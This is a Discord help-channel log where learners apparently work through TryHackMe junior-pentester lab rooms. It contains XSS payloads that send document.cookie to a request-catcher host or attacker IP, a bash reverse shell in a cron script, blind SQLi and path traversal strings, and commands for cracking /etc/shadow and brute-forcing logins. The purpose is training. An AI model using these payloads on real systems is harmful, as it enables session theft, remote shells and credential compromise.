#junior-pentester-path
can i send my payload here?
We only need to edit our IP and port number within right?
|| </textarea><script>fetch('http://aefd9d36a7f158329909e2ab60efc258.log.tryhackme.tech
?cookie=' + btoa(document.cookie) );</script> ||
What can possibly go wrong ? Trying since 1 hour
sorry i dont get it, how should i restart victim box?
you mean the vm machine
ok
virtual machine
The website machine that you're attacking
read carefully instruction 4
I have tried this as well : " https://website.thm/item/2?server=server.website.thm/flag?&x=id=9"
I did
@steel nymph i restarted it still not working
By suppose you mean expected request ?
is string.printable enough for password guessing ?
please help me
php?
IDOR: Task 2 An IDOR Example. When I click on the emails and check the URLs most are not found in the Attackbox. Is there an issue with task 2
That's what I thought...
Lollll i won a 3 pound voucher
congrats)
gratz
i dont think its problem
Yeah but if i wanna buy something its in pounds
the problem is that i dont have other 17 pounds)
does blind sqli password bruteforce works only with cleartext passwords?
no luck. found ||table_name='analytics_referrers'|| and ||table_name!='analytics[]referrers' or 'analytics[^]referrers'|| is there any wildcard to check numbers? and I checked the numbers manually. Also, I think || 'analytics_referrers' || is right, because I got the ||COLUMN_NAME= 'id' and COLUMN_NAME ='domain'; || by using that table_name. how could I find more COLUMN_NAME by using filter. (Can I filter more that one input eg. ||COLUMN_NAME ='domain' 'id';|| @steel nymph
oh, okay!
well, finally, ended the "Jr penetration tester learning path"
Jack, just drink some rum
Congrats man :)

with no interesting prize to redeem, just streaks, and pentest title
ohh, finally
that was interesting, but need rest a lot now)
thanks that person who used digit pin-code as a password)
Hello guys! just a quick question, in the Linux PrivESC, is there any other way to check what python version is installed rather than just executing python? find / -name python* -type f 2>/dev/null gets me a ton of info and not the straight up answer
I already got the answer executing python im just curious if there's another way
well it definitely lists all the pythons but it doesn't straight get the python 2.7.6 that im looking for when i execute it, anyway it's way clear than executing find / -name python* -f 2>/dev/null
Ty anyway!!! ur always helping here lol
Gave +1 Rep to @steel nymph
Weird question that I'm hoping I'm not missing an obvious answer for.
I'm doing the File Inclusion room at the moment and I'm struggling with task 5 - LFI 2, the first question asks for the request that you use to get up the files, however the answer I've got (using the method they display in the room) just comes back as a wrong answer and trying the other method, doesn't work for me. I'm using the null byte trick and that seems to work but it's the "wrong" answer. Anyone else come across this and able to shed any light? I'll take any guidance I can get on it
python -V
Linux PrivEsc task 6 - 'sorry, you are not allowed to set the following environment variables: LD_PRELOAD'
i cannot find a way around this, any hints please?
Thanks for that, I'll open burp and try that way, what's the worst that can happen
Gave +1 Rep to @steel nymph
ah ok, i had my wires crossed thanks
Gave +1 Rep to @steel nymph
need help on Task5 windows privesc, sc stop dllsvc & sc start dllsvc didn't work
Once I got the hang of it, I actually really liked the Linux Privilege Escalation room
The capstone was quite easy though
yeah im liking it so far, probably my favourite
didn't fall for that one even it was so obvious lol, ty
Gave +1 Rep to @wispy nimbus
Hey, having issues with the unquoted service path windows exploit. Is the service not starting part of the challenge?
when using sc start service
or net start service
yeah got all questions right so far apart from the last one which requires the exploit to work
hmm ok
system error
file or directory is corrupted
Hello all, In linuxprivesc task 7 when I try : find / -type f -perm -04000 -ls 2>/dev/null I do not see nano => cant add user -> cant access flag. what am I missing?
hi, is the Jr Penetration Tester path for premium user only, or anyone can access it
need to add a ?url parameter?
For some rooms yes, for some rooms no
I get 404 response
what is wrong with the link
Well, I know it is wrong thanks to the 404 response
Thank you, What would you suggest I start off with if I have no prior experience in cyber security (for context: I am a computer science student)
Gave +1 Rep to @knotty walrus
I can give you a detailed explanation in DM
feel free to DM me
Thank you!
No response in "Privilege Escalation: Cron Jobs" task
-sh: 25: ./backup.sh: Permission denied
i swear if i get one more pentester title ticket
haahaha
focus on the knowledge you are getting dude
I also get 1day freeze
i know most of this, it's nice to refresh but i was blitzing in vague hopes of getting dat oscp
also, one short for ejpt, which, meh, but still
drat. ah well
https://server.website.thm/flag?id=9 this is the link I need to request right
what should I change at your link
doesnt it needs to be server?
Well I atleast got a £3 Swag Voucher 😄
Gave +1 Rep to @steel nymph
@steel nymph I figured I should inject server into server request somehow. Could I do this in the code?
Or the path hmmmm
Please I need help with linprivesc task 7(SUID) none of the SUID enabled binaries can be taken advantage of
Thanks in advance
@steel nymph I'm pasting the server.website in. But I guess my format is wrong. api /-= (url). Just getting my format wrong I guess
Gave +1 Rep to @steel nymph
Just got the gist😃 thanks
Can someone help me? I’m stuck with the Metasploit exploitation room
getting the meterpreter session
In regards to challenge 1 in LFI, I have tried to || change the request to post in burp and add a file var in the request but got nothing in return.|| also for LFI challenge 3 I have tried || the ....// filter trick and %00 but both don't work.||
i'm not sure how to do that
I'm stuck on "Authentication Bypass" Task 3 Brute forcing with ffuf. I'm not getting a username/password but 0 errors.
I read that earlier. can I pls dm you my request I modified in burp?
Didn't seem to change anything. I'm sure its something minor I'm overlooking too.
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/login -fc 200 I'm actually using the machine IP in the command lol.
Showed me what I saved in the file from the previous task.
there might be an error with the output to the .txt file from the previous task
you might have to manually type the 3 usernames into a .txt file and use that
That was 100% it. Thank you both!
Gave +1 Rep to @marble hamlet
https://website.thm/item/2?server=website.thm/flag?id=9 yeah im so far off on this answer in ssrf task 2
Hello guys, who can briefly explain the difference between PIM( Privileged Identity Management) and PAM(Privileged Access Management)
yeah im missing the secret code.Just my format somehow is incorrect its like i paste it in the wrong place
I would play around a bit with the "website.thm/flag?id=9" in order to see how that changes the server requesting
PIM typically relates to individual accounts, where as PAM relates to groups. that's as much as i can really explain and put in words
Ok, thanks
Gave +1 Rep to @sterile crescent
hey, anyones knows where can i get the hash of the commit in github?
Does anyone have any links on how to make your own server? I am trying to do the RFI playground challenge and I need create a server to upload a file. Thanks!
I'm in LFI challenge 3. Is this on the right track? ||/challenges/chall3.php?file=welcome&../../../../../etc/flag3||
sudo python -m http.server 80
That will serve the directory that your in
You can use any of these.
```
python3 -m http.server 8080
ruby -run -e httpd . -p 9000
busybox httpd -f -p 10000
```
thank you!
Gave +1 Rep to @near vapor
For the Practical XSS: Am I supposed to wait a few minutes after submitting a ticket with the payload? Or am I supposed to open the ticket myself? I get the cookie if I select the ticket, but it says it's incorrect after cracking it. I've tried both cracked and un-cracked cookie value
any luck with solving this task? I'm stuck on this task as well
I have found 2 options but can't make any more progress.
It usually should not take that long, but yes you have to wait. If you are opening that ticket yourself, you will only get the session cookie of your own session instead of the staff session.
In case nothing is happening, a restart of the target machine might help.
That's what I figured. After the first couple of times I thought "Well, it's 'my' session cookie which probably doesn't mean much since I'm not admin" so I thought maybe there's a script that checks the ticket as staff. Unfortunately I've been waiting for about 10 minutes, still nothing.
https://website.thm/item/2?server=website.thm/flag?id=9 i added the secret code to this but not getting it. It must be so simple im blind
For the RFI playground is my code ||<?php echo gethostname() ?>|| correct?
I used something different.
you're very close
use a ||php|| specific function.
okay I will give it a try need to look it up
Very close but yet so far
like how I am with that Blind-SQL task; Task8. the only one I'm missing
have you completed challenge 3 by any chance?
can you maybe give me a hint where to paste the missing stuffs
Yes I have I need to remember how I did it though lol
i know its &
If you remember pls drop me a hint. Struggling to figure it out.
you're missing something between ||=website|| and something after|| 9||
What do you have right now?
@deep pike
I noticed that the url doesn't accept /. I did this ||/challenges/chall3.php?file=welcome&?file=/etc/flag3||
think back to how they handle subdomains for SSRF
not quite
but the right spots?
it blurs out
I would check ||the request method, something is filtered||
hmmm so its the right place.....its just i have to do &x=
yep,|| just not after ?server|| you're also missing something between ||=webserver|| pretty sure
Wasn't that challenge 1?
||it is similar but not the same||
https://website.thm/item/2?server=website.thm/flag?id=9 can i maybe get a hint of where.im struggling for 3 hours on this one.im so confused
Can anyone give me nudge on the second question in Privilege Escalation: SUID. Its asking for user2's password and I nabbed the shadow and passwd files and ran them through john with no luck for the user I need
||You're missing the subdomain name between "=" and "webserver" so it's supposed to be server=name.webserver.thm/flag?id=9 and you just need to tack on the &x= at the end||
@near vapor hi man can you give my a idea what this task ask for Which function is causing the directory traversal in Lab #4? cant figure what to put there
@modest arch
Take a look at Task 3.
you have no idea how much it took to realize what was asking task 3
i have just that one and cant figure what it is
If you have the answer for Task 3 you should be able to answer Task 5's question about lab 4.
re-read the question and then refer to task3.
I figured out, but still dont understand it.
im not sure if you are using a tool or the browser tools. I used the browser itself and messed around to get the right ||request method and loading the page in another tab||
got it.
with the playground flag I am still getting errors and unsure as to why.
I have a server at 0.0.0.0:8080 and am getting my ||rfi.txt which first had <?php echo gethostname(); ?> that didnt work so I tried echo php_uname('n');||
and im getting an error that says couldn't connect to server. I also tried to connect in a separate tab and that worked.
how do i use the tryhackme request catcher?
i'm also stuck on it
Do we add directly to url or the search bar provided
well
Lab 2 right?
have you tried adding what's been told to the url?
Yeah but it doesn't seem to work
I tried the ../../../../etc/passwd
Were u able to solve lab 1?
i wasn't
I got the answer but i dont think the server gave me the response i was supposed to get
@chrome sand think full path.
Hmm full path through the url? @bleak pilot
on the active reconnaissance room, task 5, it keeps saying that my connection has been closed
is this your Question that you are working on:
Give Lab #1 a try to read /etc/passwd. What would the request URI be?
i believe he's talking about lab 2
Second question
For Lab 2
Yeah
What is the directory specified in the include function
But even for lab 1 i got the answer but wasn't able to read the etc/passwd file
/etc/passwd
For lab 1 in the URL i had
Give me a couple of minutes. Was elsewhere. I'll fire it up.
http or https?
https://website.thm/item/2?server=api.webserver.thm/flag?id-9(&x=) can someone help me this is the closest ive gotten to ssrf
@earnest shell Read the top of the page for the server you want to query.
It's includes
Got it from the error messages
Lol
But still not able to read the files the labs are meant for
Good job @chrome sand
as in ssrfqi
Thanks for helping out
Gave +1 Rep to @bleak pilot
still stuck on lab #2
@earnest shell what task are you in?
im in ssrf task 2
i feel like im on 99.9.....but im not seeing the server lol
Too bad they have extra databases in there. Wild goose chase and you have to start over again. Hours gone. Why did they have to put an extra database that could be discovered on the SQLi module?
nvm i found it out
welldone
@earnest shell so on the final page of instructions, pay close attention to the server that has the flag.
Good job @copper garnet
Nice job bud
Honestly this stuff is just about trying harder
thanks
Discord has been a really good resource for me as well as reddit
oh wait i see question marks
@earnest shell The format of your original line was really close other than the (). And read the server name they say the flag is on. You are SO close.
This is what you originally posted: https://website.thm/item/2?server=api.webserver.thm/flag?id-9(&x=)
your ? isn't the correct thing nor is the second server name
You are VERY close!
Sorry. Forget about the ? statement. Been a long day. your ? marks are all good.
Read the description of the server holding the flag.
what the heck pretty funny that i dont see it
Are you in the split screen window?
i am
See if you can left-click and hold while dragging from underneath the url line to the Server Requesting at the bottom.
No, sorry again a long day. look at your id in the line you posted.
character right after it.
Nope. original character before the id was correct.
im like one char off lol
Ive got good news....
That actually looks correct.
it was the =
only took 6 hours
I apologize for the sideways path.
thanks so much!!!! that one killed me but still going
now you can sleep.I owe you my life
Good job. and good luck.
You owe me nothing. Helping one another out makes our industry stronger.
Having some trouble with Task 5 if the LFI room, i was able to execute the exploit, but the question is what function is causing the directory traversal in lab #4?
I have tried nullbyte as well as current directory but none of them seem to be it
Read the error message
It's not asking for anything you input.
It's asking for the php function that allows directory traversal to happem
Happen
You're beautiful
Got it
Thanks! @drifting drum
Gave +1 Rep to @drifting drum
got that one is something else read task 3.
I was able to get to the file in the first try on this one so didn't see the error messages
I added some fuzz now and was able to see it
Ah yea. Even if you can get the file, it's always good to check errors so you know what's happening
Makes sense!
Hey all I’m having an issue in Auth. Bypass Task 4 getting the Curl req #1 and #2 to properly change the users password reset link to attacker@hacker.com. I’ve reset my machine and attack box 5 times thinking there may be an error. I copy the curl verbatim, but the website continues to show the original email address. Any one else have this issue?
hello guys
i need help with SSRF jr pentest task 5
does any one know or have done this?
hello guys
i need some nudge, File Inclusion VM - Task 8 flag2?
@open hornet he got the flag on that question. 🚩Welldone
Hi. Is there any other way to access the windows machine on Windows PrivEsc? Other than using the attackbox. Im trying to find a way to acces using my own kali machine
Xfreerdp
Its asking domain and pw. Is there any scanning i need to do?
which task is that also some of the task in win privesc gave user and pass that would be enough to connect with rdp or evilwinrm
Task 2
It doesnt state how to connect or any scanning etc. I tried some google and saw the guy use the attack box
i think you cant use rdp for that since it does not provide any creds nor do i know if their rdp connection is open
just use attackbox for that but for task 5 and 6 you can rdp
Room cross site scripting task 8. What ip do I have to add into the path that gets pasted into the ticket. #help
And the port number
Your Listener's IP and Port or you can use the THM's Request catcher (10.10.10.100).
@balmy mantle what a boss thankyou
https://media.tenor.com/images/ac160e60bac623635384605dc5cf9ec1/tenor.gif
@balmy mantle just waiting for the cookie🍞
It shouldn't take long to appear in the Request catcher.
It gave me a THM..... But nothing in the catcher... Hmmm
I need some help on Linux PrivEsc $PATH (Task 10)?
@balmy mantle dmed you
Where are you stuck ?
@balmy mantle Thanks for the hints got the flag 🚩
Gave +1 Rep to @balmy mantle
Everyone here is a volunteer. You need to be patient.
Can you explain to me why you think it's that exploit? I can check your process but I haven't completed the room
I found the CVE after searching the vulnerable application name with version
But the script has many errors
Ik it has errors so was checking if it still has issues
@modest arch Could you please provide content of the script ?
You're running it with python 3
It's written for python 2
raw_input and print as a keyword rather than a function, those are python 2 things.
lesson learned for skipping python2 🙂
You should be able to tell from the shebang at the start.
This is one of many reasons that it's critical to actually read the exploit even just at a high level.
The other reason is so that you don't break stuff.
There was famously a fake SSH RCE exploit that would wipe your attacking system.
It's a big thing that OSCP/PWK tries to get stuck in your brain. Reading and understanding and fixing exploits
So useful things to note from reading that, it expects a proxy on 127.0.0.1:8080
Url
Comment proxy line
Remove proxy mention from "r ="
You can start burp if you want that, or modify it to not use the proxy
And change the print back to remove the brackets
It's important to know why you're doing that too though
Indeed
If I keep the proxy as in this pic and start burp will the request be captured in burp?
Can I PM you
Sure
Simple sad story. I finished the path. Collected all tickets. Vouchers completed are literally free stuff. Title and streak freeze.. 🤣 others just stuck at 2 tickets..
yesterday I completed like 10 rooms and only got the title 1day streak freeze tickets which really sucks
File Inclusion Task 8 - Challenge 2. Does anyone have a clue what to do after I've ||changed the cookie||? I see an error now, but cant figure out how to get around this one.
What's the error? Does it look anything like what you did to your cookie ?
Looks like it has accepted me as admin, but that I'm not complete with the lab just yet 🙂
It says:
||Warning: include(includes/Admin.php) [function.include]: failed to open stream: No such file or directory in /var/www/html/chall2.php on line 37
Warning: include() [function.include]: Failed opening 'includes/Admin.php' for inclusion (include_path='.:/usr/lib/php5.2/lib/php' ) in /var/www/html/chall2.php on line 37||
Play with the cookie some more and keep an eye on the error message
Thanks! ||My cookie was named Admin with a capital A.. it didnt like that 🙂 ||
Gave +1 Rep to @dull turtle
https://tryhackme.com/room/nmap04 task 3 not getting an OS with "sudo nmap -sS -O --traceroute machine IP"
get 1 hop, the TCP/IP fingerprint, no exact OS matches
Remove the --traceroute and see if that helps
Can't seem to get Content Discovery on the VM to work
the content discovery didn't say you needed to be on the VPN?
Gave +1 Rep to @steel nymph
@steel nymph Thanks for letting me know about the VPN ... the room designers need to really include a sign post as part of a clear precise instructions.
Gave +1 Rep to @steel nymph
Hello. Can someone tell me about the Windows Privesc room in JR pentester? Task 2. How do I get into the deployed machine ? There are no credentials anywhere...
Oh, thank you so much. So much time, it would have been possible for the THM team to fix it.
Gave +1 Rep to @steel nymph
I have enabled foxyproxy and put intercept on at proxy tab but the browser isn't hanging? i can see i receive data on the other tabs but cannot choose 2 forward or drop the intercept. Is there a setting i need 2 check?
thanks @steel nymph
Gave +1 Rep to @steel nymph
Still stuck on File inclusion Task 8 - Challenge 2.
Changed the ||cookie to value admin and got the admin page. But cant figure out how to get to the flag.||
Any tips?
thanks - ill try playing around more 🙂
Gave +1 Rep to @steel nymph
Anyone done with File Inclusion room?
tryhackme.com/room/fileinc
Hello!
Since the number of prizes is limited, is it still worth to try getting tickets? I mean, all limited prizes are claimed by now aren't they?
I think someone yesterday said the claims were not updated. But afaik its last day today
Actually they extended the event to 31/10 and added prizes
Oh 🙂 Nice to know.
But yeah, they do not update the claims, which is not a good thing for my school projects xD
Why did I just get kicked from the RDP connection
Now I can't connect
I restarted the machine
Now it works
Odd
Aaand disconnected again..
Are you using xfreerdp?
Maybe try remmina if it's working.
try what
I mean I just said it, remmina ^^?
Maybe it does and there is another issue, but it's worth to try.
i don't know how you expect me to install a linux app on windows but ok
Oh I thought you are on linux, my bad.
I just sent this image ...
So you want to argue now because I tried to help you? ..
Hi! I'm stuck on question (File Inclusion) "Give Lab #3 a try to read /etc/passwd. What is the request look like? ". But I get this and can't figure answer? Why "/lab3.php?file=include("../../../../../../etc/passwd%00").".php");" is not correct?
Ok, I got this. I counted the number of * and edited payload xD
I'm completing nmap post port scans room and it has a question What does the script http-robots.txt check for I ran the script I got open ports and services but I'm not able to figure out the answer
@analog quartz you can also cat that script and it describes it in the description.
okayy
i did use a http portscan module but it says this is not a wordpress site
what can i do now : (
got it thanks
Gave +1 Rep to @steel nymph
||https://website.thm/analytics?referrer= referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.columns WHERE table_schema = 'sqli_four' and table_name='users' and column_name like 'username';--||
What now? Time Based, Blind SQLi.
Any help would be appreciated.
That's the part i didn't really understood :d
Yeah, I guess that's what we need to pass the level.
give me the filter word please : (
I'm not able to ping the windows privesc machine attached with the task even after connecting with the VPN. Any suggestions?
Gave +1 Rep to @steel nymph
I really would have missed that
Thank you mate got it
Gave +1 Rep to @steel nymph
hey, i have issues with the freaking Burp and i don't know what I am doing wrong..(burp: Intruder Task 10,11)
For some reasons, when using Intruder and start the attack - all of the results have same status and length value... I had to manually try 100 acc + pass to get to the right one.
@steel nymph on file inclusion task 2 I've changed the cookies and I have been looking at the errors I get in the response window but I can't seem to get the correct file path to reveal the flag. Any tips or suggestions?
how do you use spoiler?
I've done || http://MACHIN_IP/challenges/chall2.php?file=../../../../etc/flag2||, Also || http://MACHINE_IP/challenges/chall2/etc/flag2|| and other iterations of those.
also I dont have a cookies tab in my developer console and I cant seem to find it?
ok thank you Ill look around
@steel nymph This is what I got

play around with that cookie and see what message u get
@steel nymph || I've changed the path to /etc/flag2 and it just loads another cookie window in Guest again ||
Combine your answers
Ive been getting those too earlier. But now i already know.
U need to input invalid credentials, and than intercept those request.
U cant put the username and password payload manually in the position tab.
U need to intercept those invalid creds request, then the the username and password payload will spawn in the coding by itself. Now that will work.
You need to unshadow the file first
You need a copy of both the etc/passwd file and the /etc/shadow file. Then use
unshadow passwd.txt shadow.txt > unshadow.txt
Then crack the unshadowed file
There's likely more than one password in there and there's a good chance the root passwd isn't crackable. You only need the hash for user 2
Hello I'm doing the Vulnerabilities 101 Room. is NVD and exploit-db down for anyone else?
nope works for me
does crontab work every 6 mins in linux privesc?
1 I thought
hey where is the "flagUSP.txt" in Windows Privesc Unquoted Service Path? Can't seem to find it
Weird. I'm having DNS problems with nvd and exploit-db. Maybe my ISP has a problem looking at those sites. haha
RISE AGAINST SUPPRESSION OF 1337 H4CK0RS!!!
lmao what
in one of the user folders
nvm found it
I upgraded to meterpreter and search cause why not
thanks
Gave +1 Rep to @lusty bolt
I'm pretty confident that I could have broken into the server room and taken the servers by now vs getting flags from task 8 in the File Inclusion room
@waxen mantle same ive been stuck on task 2 all day 😦
I don't see how tasks 1-7 supplement task 8 challenges
you mean challenge 2 of task 8?
or just launching the vm? lol
@waxen mantle yes task 8 challenge 2 lol
yeah. took me a while too
I got challenge 2 and yet 1 and 3 evade me
I'm stuck here
||user admin as lower case||
So try to play around with that cookie value to see how the site behaves, especially the include warning part.
You changed the cookie to the correct value. Now add more to it
i still don't understand how the error text works of how it is supposed to point you in the right direction
Hi, can you help me for ssrf room, I don’t understand how it work?(view site)
Well right now it's trying to include the file Admin.php while at the same time forcing it to open that file in the includes folder. That's why it says failed to open "includes/Admin.php"
||research about verb tampering and null bytes then you can get flag ||
don't get how to privesc using path
if file created by me have same permissions as me
@full escarp ok will do thanks
Gave +1 Rep to @full escarp
theres also set of payloads you can try, check payloadofallthings in github
Payloads all the things
I get this in the dll hijack in windows privesc. what to do?
you have to make a program with suid or sudo call it
like in example ?
have you tried with the gui? services.msc
nope. will do
yes. so make a file named thm. that program will execute it.
maybe i did something wrong
but when i run test nothing happened
neither error, nor result
I'm not getting reverse shell in linux privesc task 9 cron jobs
did you make the thm file executable?
check commands without cron
hmmm, maybe no
Do any one know Nmap host discovery using tcp and udp in Nmap live host discovery
Hello guys, I am trying to do the room "Protocols and Servers 2" and I am stuck at the task 6. I executed this command :
hydra -t 64 -l lazie -P /usr/share/wordlists/rockyou.txt 10.10.64.86 imap
But after few hours I still don't have any result, is there somebody who can help me to find what I am doing wrong please ?
it should only take seconds
I know, this is why I am asking 😭
I am stuck at which tcp ping scan does not require a privileged account
Can't do anything
give me a sec
Yep, thank you 🙂
Gave +1 Rep to @wraith ice
try to reboot the machine
you can add -v to get more details on what is going on iirc
this is the 3rd reboot that I tried
@wraith ice attack box or your own box?
btw, you can't connect directly as a different user from the browser right?
? I rebooted the target vm. didn't work
I dont' think so, you can rdp though
I am doing Nmap live host discovery and stuck at task 7
👍
I know but it doesn't help so much, it alternates between errors "service shutdown" and failure with a new password
you just need to read the page, it explains what privleges are needed for each type of scan
@modest arch what are you stuck on?
For which question? There are three.
First one
correct IP ? you can also diminish the number of threads to 16 for ex instead of 64
@noble dust gave answer in like 10 secs
Last 2 tickets 😥 . This is all I got for 50 tickets.
@modest arch They only talk about two TCP type scans and each is explained in their respective paragraph.
Same here 😦
yeah. and make sure you are connected to the vpn and there is only 1 tun interface
command is working without cron
but not with cron
in what file is ur command?
hmm
ok, idk then, sorry
i had some typos so it wasnt working
@bleak pilot i don't understand the answer format
can i have a hint for file inclusion task 8 challenge 2 flag 2
i currently have burp up and see the file format but im struggling turning the file path into a request and get the fille\
@modest arch Tis is the question that I think you re talking about: Which TCP ping scan does not require a privileged account?
file
Is this correct?
check the titles of paragraphs. that's the format
cookies are yummy
Ya
okay
Yes
make sure you did chmod 777 backup.sh
Yes correct IP, I also tried with 16 threads and without the option -t
😭 😭
I use the exact same command !
send screenshot of output?
With the right IP of course
@modest arch I guess I don't understand the confusion then.
connected to vpn? Are you using your own machine or attackbox?
same. lmao. rtfm right?
I'm working on Local File Inclusion and have no idea what is being asked of me in Task 4, Lab Lab #2
In Lab #2, what is the directory specified in the include function?
Yep, let me few seconds
I relaunched the bruteforce without the option -d few minutes ago
Yes of course, and I tried both
did you try terminating and restarting the vm you are attacking?
I think I am not allowed to paste screenshots here, is it possible ?
Yes, this is why I relaunched the command
yeah of course. I mean I just did...
you can dm me if you are not comfortable posting here
It's not the problem, I tried the copy/paste and the drag and drop but Discord doesn't react.. when something don't work nothing work ahah
still not working
check the error message
save ss and upload with + sign
Thanks. Cheers
Gave +1 Rep to @wraith ice
Sitting in front of my face the entire time -.-
will check again. give me a min
okay im in the repeater trying a numerous different variations of this cookie, am i on the right track? Cookie: THM=admin; file=..%2f..%2f..%2fetc%2fflag2
you can ditch the admin part now iirc. also no need to URL encode
iirc? sorry im new
if I recall correctly.
@steel nymph is this the right file?
I'm not able to run it as karen
if i send file only not encoded it says "refresh" @wraith ice
not in sudoers
think a bit more...
@steel nymph Umm. I am also confused about what you are saying...
nah. I am done
k
I'm able to get normal reverse shell but not the root one
same as what is given on thm
./backup.sh
Alright, more issues on PHP. Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?
DO NOT EXECUTE THE SCRIPT. Let cron do its thing. That's like the whole point of cron
cron doesn't seem to be doing its thing
Wait 1 min. It should run every minute
what is output of cat backup.sh? What's in there?
If it doesn't call back to you, try to use the local nc binary to get a revshell to localhost (127.0.0.1)
#!/bin/bash
bash -i >& /dev/tcp/<HOST>/6666 0>&1
I'm able to get reverse shell but not as root
terminate and restart the machine. might fix if something broke
lol. congratz. sometimes you gotta be patient...
🙂
Need help with -
Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?
Unable to get the version ID
oops
Access Denied! allowed files at THM-profile folder only!
I just don't understand this at all - literally my brain isn't able to comprehend it -.-
This is my first room today =[
Definitely, taking a step back has solved a lot for me
"Once your friend reaches 500 points, email us with your TryHackMe username and we will award you and your friend 2 extra tickets"
Where i need to write about referral
nfs not giving root shell
Did anyone got the challenge 2 of file inclusion ?
Tried almost all the combination couldnt get any error
no, noone)
Hello, could anyone tell me where is that flagUSP.txt file on the last win Privesc Challenge ? lol
hi, i am at the cross site scripting. For the blind XSS, i first tried to write the payload by myself, sending the cookies on a http.server started with Python. I didnt receive anything so i tried with a nc handler, which didnt work either.
i'm looking around for 1h
anyone?
To check if it was my payload that wasnt working, i copied pasted the given payload ( and did specify my port )
but it still isnt working
Task 8?
Anyone able to assist with File Inclusion - Task 8 - Flag3. I've tried for the last two days and not sure what I'm doing wrong. The closest I've come is with getting character encoded output and an (include) directory that doesn't seem to help.
Yes
||did you change the cookie?||
For 8:2 look at the hint.
finally, i used the tryhackme requests handler, got my url and everything, but nothing showed up. Does anyone achieved this challenge and can hint me around what im doing wrong ?
Yes got to admin page but what after that ?
also currently stuck on this
ok, already done so 3 times already
@steel nymph
||try changing the cookie to something else now...||
i even used dns to get the cookie
tried to concatenate it to my domain, not working either
yes i do
which btw isnt a valid base64
Ohh is it . Okay i will play around with that.Thanks @mellow flume
created that nfs executable after mounting one of the folders and set the suid bit and executed it but it's giving normal shell
oh F
ubuntu
ok thanks, gonna restart a little more
btw, while i was checking if my payload was faulty or not, i tried a few fetch in the debugger, fetch that mozilla didnt like at all, responding with some "mixed content warning"
i read the mozilla page on it halfway
does a payload like
<img src="oi" onerror="document.location.href = 'http://' + btoa(document.cookie).replaceAll('=', '') + 'f79d0a17b78d347b4a0e47deeeb7b1e7.log.tryhackme.tech';">
would circumvent this protection ?
yeah, i just tried this since it wasnt working
but yeah just gonna restart and go with the given one, a bit tired of this room
I'm having a tough time with the 4th flag in task 8 for rfi
What I have tried so far is making my own server with python3 -m http.server 8080, next I made a text file that has ||<?php echo gethostname(); ?>||
I put that into the url with ?file=0.0.0.0:8080/rfi.txt
and get an error of couldnt connect to server
o
facepalm
so I can just use my machines ip?
thank you I will give that a try
XSS room, last challenge:
I am connected to vpn (tun0) and have netcat running on 9001
now i should receive a cookie to this terminal with this request, right?
</textarea><script>fetch('http://10.8.193.69:9001?cookie=' + btoa(document.cookie) );</script>
yeah, but when i did it in the thm Attack box, it works ?
i don't get anything ..
ah okay
Like lassi said, try to open that ticket, if you get your own session cookie you did everything fine and you only have to restart the machine.
hmm, didn't get my own cookie
but i should put my vpn ip ?
under the tab "access"
and:
nc -nlvp 9001
so strange
alright thanks
@steel nymph thank you so much! I feel so dumb lol
Gave +1 Rep to @steel nymph
I don't think it matters, but maybe create a new ticket without the forward slash after the port number, I think that shouldn't matter, but worth a try.
@shadow echo @steel nymph thank you
Gave +1 Rep to @shadow echo
@steel nymph thank you
+rep @steel nymph
Gave +1 Rep to @steel nymph
I do it for you Junior 🙂
Gave +1 Rep to @shadow echo
alright that doesn't work as well 😅
Can you try curl 10.10.10.10/whoami in your machine?
yuo, curl works
@steel nymph that could be yes, i had to switch from VIP to regular server bc vip didn't work
well, i already completed it and it works, but thanks anyway gus
I'm typing the code in as it says in the task or atleast I believe that I am?
Hey guys quick question, I don't know if I should take this path or Pentest+ path. Beginner in sec, just completed pre security path
@zenith edge you should have "$" or "#" in your bash on the start of your line
Is anyone having OpenVPN issue? I even tried to redownload but it gives me a 404 an error occurred. Trying to get through the Jr. Pen Testing.
@alpine wyvern try switching VPN server, VIP servers sometimes have issues
Well ignore the ~
I hate that thing. Its always popping up right before I hit enter.
The complete beginner one? Ive worked in networks and Im a developer atm. So I dont know if I need that
you can do the JR Penetration Tester, you can win prizes there and it covers a lot of basic pentesting TTP's
Thanks man!
Gave +1 Rep to @steel nymph
Thank you :)
Can anyone help me with task 6 in the subdomain enumeration room? 😅
I ran the ffuf command || with 472 after -fs || but it's not returning the subdomain
Thank you! Its running the scan now 🙂
Gave +1 Rep to @steel nymph
@steel nymph the given command is:
user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP -fs {size}
and I typed in:
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host:FUZZ.acmeitsupport.thm" -u http://10.10.27.150 -fs 472
nope nothing my output looks like Fenris's though
is it actually ur wordlist path?
try to run without fs
check the wordlist path if you aint using the attackbox
Is 472 the most occurring size value from the previous result? (Not by me)
And how does your output without the -fs flag look like?
Try to run your command without -fs parameter then think which size u should ignore at your next search for more clear results and add this size with -fs command
@modest arch I can't post a picture for some reason but my output looks like this ||and the size for each one is 472||
alright I'll give it another try
So what I did to fix it is just jump to the next task and re open a new machine and then attack box. use the machine IP and not the attack box ip. you can go back and do that task 6 again that way
🤔
Alright I'll give that a try as well! Since I've had mine open for quite some time from other tasks
Hello guys im getting some troubles with the SUID PrivESC of Linux room, may I get some help? I've tried: fnd / -type f -perm -04000 -ls 2>/dev/null which lists the files that have the SUID bit set, however nano doesn't appear in those files even tho the example is using nano, and also none of the files seems to be exploitable following gtfobins, only base64 but it won't allow me to exploit it since i cant use sudo, may i get some hint? Ty in advance!
Nano was just an example used. You can exploit base64 with SUID. Check gtfobins
Okay, thank you, ill try it!!
Gave +1 Rep to @drifting drum
can anyone help with file inclusion the last task
What about it?
@drifting drum this is what I get back
@pearl compass think I could ask you for help on challenge 3?
You're trying to do LFI on a page that wants you to perform RFI
What do you need help with?
I struggled on it a couple days ago, I'll come back to you in like 5 minutes to make sure I can describe what I was running into properly.
Read what the page said wrong.
i set up the || cmd.txt file and the server in the terminal and I used this in the browser bar to execute, http://10.10.114.253/playground.php?file=http://10.10.54.251:8000/cmd.txt||
You can't expect a .txt file to be ran as code
Because it's not code
